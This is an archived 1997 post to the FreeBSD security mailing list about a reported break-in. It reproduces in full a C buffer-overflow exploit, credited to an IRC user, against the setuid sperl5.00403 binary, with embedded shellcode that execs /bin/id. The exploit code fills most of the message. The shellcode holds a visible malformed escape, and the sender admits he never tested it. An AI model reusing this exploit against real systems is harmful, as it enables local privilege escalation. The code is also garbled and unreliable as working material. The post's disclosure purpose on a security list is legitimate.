Date: Wed, 30 Jul 1997 14:44:02 -0400 From: Patrick Gilbert <gilbertp@videotron.com> To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD Message-ID: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> In-Reply-To: <Pine.BSF.3.95.970728172339.3844N-100000@mail.MCESTATE.COM> References: <Pine.BSF.3.95q.970728184930.26434E-100000@netrail.net>
next in thread | previous in thread | raw e-mail | index | archive | help
At 17:27 97-07-28 -0700, you wrote:
> Just a update on how the break-in was done after the hacker was
>confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using
>this and perl5.00401, the user was able to rlogin onto the other machine
>without using a password.
After a brief discussion with TheCa on Efnet, he dcc'd me his famous
exploit for a transcript of
his brief moment of fame on this discussion list.
/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl
exploit by Ovx */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define
BUFFER_SIZE 1400
#define OFFSET 600
char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char
*argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() -
OFFSET;
memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));
buf[BUFFER_SIZE-1]=0;
execl("/usr/bin/sperl5.00403",
"/usr/bin/sperl5.00403", buf, NULL);
}
I haven't had time to try it, so this may not work. Then again, he may be
lying.
Then again, do we really care ??
Bah.
Patrick
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3.0.2.32.19970730144402.006c5dd4>